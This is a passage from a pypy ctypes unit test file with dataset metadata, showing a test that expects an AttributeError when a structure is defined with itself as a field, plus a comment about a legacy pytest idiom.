        # exec'd) is a legacy idiom removed in modern pytest — confirm the
        # pinned pytest version still supports it.
        pytest.raises(AttributeError, """
            A._fields_ = [("a", A)]
        """)
| idea2/pypyjs-3/deps/pypy/pypy/module/test_lib_pypy/ctypes_tests/test_bitfields.py | 8,311 | bit fields are not allowed on non-integer types. anonymous bit-fields gave a strange error message | 98 | en | 0.763951 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.